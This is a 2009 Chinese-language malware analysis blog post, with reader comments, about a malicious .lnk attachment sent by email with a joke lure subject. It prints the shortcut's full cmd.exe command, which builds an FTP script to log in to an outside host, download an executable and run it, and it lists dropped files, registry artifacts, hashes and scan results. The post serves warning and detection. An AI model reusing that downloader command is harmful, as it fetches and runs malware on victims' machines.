Yahoo信箱LNK病毒─「love….超噴飯的」

2009 年 02 月 05 日 – 11:17:38

昨天收到一封Yahoo寄來的郵件,標題為「love….超噴飯的」,郵件內文夾帶一個附件檔,副檔名為「LNK」,連同前幾天收到這類型的郵件,已經有很多封,此類型病毒應該已經流傳一陣子了,請各位小心。注意:記得將防毒軟體即時掃描設定為所有檔案皆掃瞄。

這封Yahoo郵件畫面,如下所示:

此LNK惡意檔案會執行下列命令:

%windir%\system32\cmd.exe /c echo ftp -s:c.c > c.bat&echo c.exe >> c.bat&echo del c.c >> c.bat&echo open www.as08.com > c.c&echo as08>>c.c&echo 888>>c.c&echo get c.exe >> c.c&echo bye >> c.c&c.bat&

此惡意程式執行之後,有下面的行為:

[DLL injection]
C:\WINDOWS\Help\F3C74E3FA248.dll

[Added file]
C:\WINDOWS\Help\F3C74E3FA248.dll
C:\WINDOWS\Help\F3C74E3FA248.exe
C:\WINDOWS\system32\c.bat

[Added COM/BHO]
{1DBD6574-D6D0-4782-94C3-69619E719765}-C:\WINDOWS\HELP\F3C74E3FA248.dll

此惡意程式執行後,有兩個惡意檔案的數位簽章竟然顯示是微軟檔案:

警政署提供的NPASCAN無法在VMWare環境中執行,畫面如下所示(本來想試試看效果勒,希望此工具能支援囉):

下列是 VirusTotal 掃描結果 (僅提供參考)(很慘吧):

檔案 超噴飯的.lnk-1 接收於 2009.02.04 12:03:05 (CET)

結果: 1/39 (2.56%)

反病毒引擎     版本     最後更新     掃瞄結果
a-squared     4.0.0.93     2009.02.04     -
AhnLab-V3     5.0.0.2     2009.02.04     -
AntiVir     7.9.0.71     2009.02.04     -
Authentium     5.1.0.4     2009.02.03     -
Avast     4.8.1281.0     2009.02.03     -
AVG     8.0.0.229     2009.02.03     -
BitDefender     7.2     2009.02.04     -
CAT-QuickHeal     10.00     2009.02.04     -
ClamAV     0.94.1     2009.02.04     -
Comodo     961     2009.02.03     -
DrWeb     4.44.0.09170     2009.02.04     -
eSafe     7.0.17.0     2009.02.01     -
eTrust-Vet     31.6.6341     2009.02.04     -
F-Prot     4.4.4.56     2009.02.03     -
F-Secure     8.0.14470.0     2009.02.04     -
Fortinet     3.117.0.0     2009.02.04     -
GData     19     2009.02.04     -
Ikarus     T3.1.1.45.0     2009.02.04     -
K7AntiVirus     7.10.617     2009.02.03     -
Kaspersky     7.0.0.125     2009.02.04     -
McAfee     5515     2009.02.03     -
McAfee+Artemis     5515     2009.02.03     -
Microsoft     1.4306     2009.02.04     -
NOD32     3825     2009.02.04     -
Norman     6.00.02     2009.02.03     -
nProtect     2009.1.8.0     2009.02.04     -
Panda     9.5.1.2     2009.02.03     -
PCTools     4.4.2.0     2009.02.03     -
Prevx1     V2     2009.02.04     -
Rising     21.15.20.00     2009.02.04     -
SecureWeb-Gateway     6.7.6     2009.02.04     -
Sophos     4.38.0     2009.02.04     Mal/DownLnk-A
Sunbelt     3.2.1835.2     2009.01.16     -
Symantec     10     2009.02.04     -
TheHacker     6.3.1.5.246     2009.02.04     -
TrendMicro     8.700.0.1004     2009.02.04     -
VBA32     3.12.8.12     2009.02.04     -
ViRobot     2009.2.4.1589     2009.02.04     -
VirusBuster     4.5.11.0     2009.02.03     -

附加訊息
File size: 2083 bytes
MD5…: 52eb43f19995f08732051ca7a9aec424
SHA1..: f5e20a2460dced6834c182b133b1aefe178dc51c
SHA256: b83f2cf1cd7d7d0ad6af95a4374aadb6fa94f455eb98eba2c39ef49533cc4637
SHA512: 18ad6cbd80dfcc7116b4a90e20d7d949da20a8d4bd3459cf46e791c62557468a
ec827764343917d2e554869b4baf3cc237f149030ebd929062bd2e4f927d5a52
ssdeep: 24:8S2Pj0j8A5aYef2XwGBvhHIwb+4o0KJi8OhKR1Xt0fqmtW1XuxKlEi9J:8Si0
f5cGAwFoIhpg+xy
PEiD..: -
TrID..: File type identification
Windows Shortcut (100.0%)
PEInfo: -

小紅傘線上分析的結果(下一次病毒碼更新,會包含此惡意程式特徵碼):

  1. “Yahoo信箱LNK病毒─「love….超噴飯的」” 目前有 12 迴響

  2. 看到有數位簽章時,嚇了一跳,
    還好數位簽章是無效的~

    By Directnorm on 2009 年 02 月 5 日 - 11:59:21

  3. 參考資安論壇:
    http://forum.icst.org.tw/phpbb/viewtopic.php?f=8&t=16198

    By wscooch on 2009 年 02 月 5 日 - 23:50:44

  4. 嗨 Roger好久不見
    我剛才試著吧你分析出來的網址丟到TM WRS查詢
    未偵測出關於該網址Lose我已經回報
    hxxp://www.as08.com
    目前手邊沒有虛擬機所以暫時無法測是該網頁所含的惡意程式
    如果可以是否可請Roger代勞為大眾把關

    By Wayne on 2009 年 02 月 6 日 - 14:00:27

  5. 我有用NPASCAN掃過,他掃出下面這個東西,請問Roger大大是正常的嗎?
    -==<>==-
    Current User : MYCHAT-89C04C70\Administrator
    Current IP : 211.76.
    Start Time : 06 February 2009 10:37:19
    ——————Start Scan———————–
    C:\WINDOWS\Help\F3C74E3FA248.dll
    本機共發現 1 個可疑檔案。
    ——————-End Scan————————

    By Amigo on 2009 年 02 月 7 日 - 22:40:29

  6. 這應該是有問題的檔案。如果可以的話,請提供檔案給我(記得用壓縮工具壓縮,並且加密碼,密碼為virus)。

    我的Email:roger@malware-test.com

    By Roger on 2009 年 02 月 7 日 - 22:48:02

  7. 回覆Wayne:那個網址目前已經暫停服務了,所以,無法下載惡意程式。

    By Roger on 2009 年 02 月 7 日 - 22:49:02

  8. 應該是說那些行為都是之後下載的執行檔產生的
    LNK 檔只是單純的作ftp 下載跟執行的動作
    根據我們手上一堆樣本的分析之後 這類型的信件應該都可以被偵測到了
    只能說每波攻擊之後 病毒作者總能想出另類的方法來突破封鎖

    最有效的應該還是在閘道過濾或郵件過濾那邊直接把這類型高風險的檔案格式進行封鎖 畢竟很多檔案類型在正常狀況下都不大可能有人寄的

    By Keith Lin on 2009 年 02 月 8 日 - 17:16:48

  9. 在Vista 不用怕啦

    要記得!!!
    有"使用者帳戶控制(UAC)的管制"

    只要不要太笨還按允許就好了

    By God on 2009 年 02 月 9 日 - 16:15:26

  10. 以下這篇文章是趨勢科技資訊安全顧問游啟勝(Kevin),針對這個開春第一隻中文病毒所做的深度分析,有興趣可以來看看:
    http://itgroup.blueshop.com.tw/domynews/malwarewiki?n=convew&i=5481

    By 崔嘻 on 2009 年 02 月 11 日 - 14:13:10

  11. http://tw.group.knowledge.yahoo.com/fix-computer/article/view?aid=640

    By 對面的賢者 on 2009 年 02 月 14 日 - 21:26:58

  12. 情色喜劇之我愛友家.lnk
    3K 下載

    —————

    這又是一隻類似檔案

    還假好心提醒 —- 不过有点儿童不宜

    By wiseman on 2009 年 03 月 28 日 - 15:00:55

  13. 收到打開會怎樣?

    By kawaiyi on 2009 年 10 月 3 日 - 01:51:22

請在此留下您的意見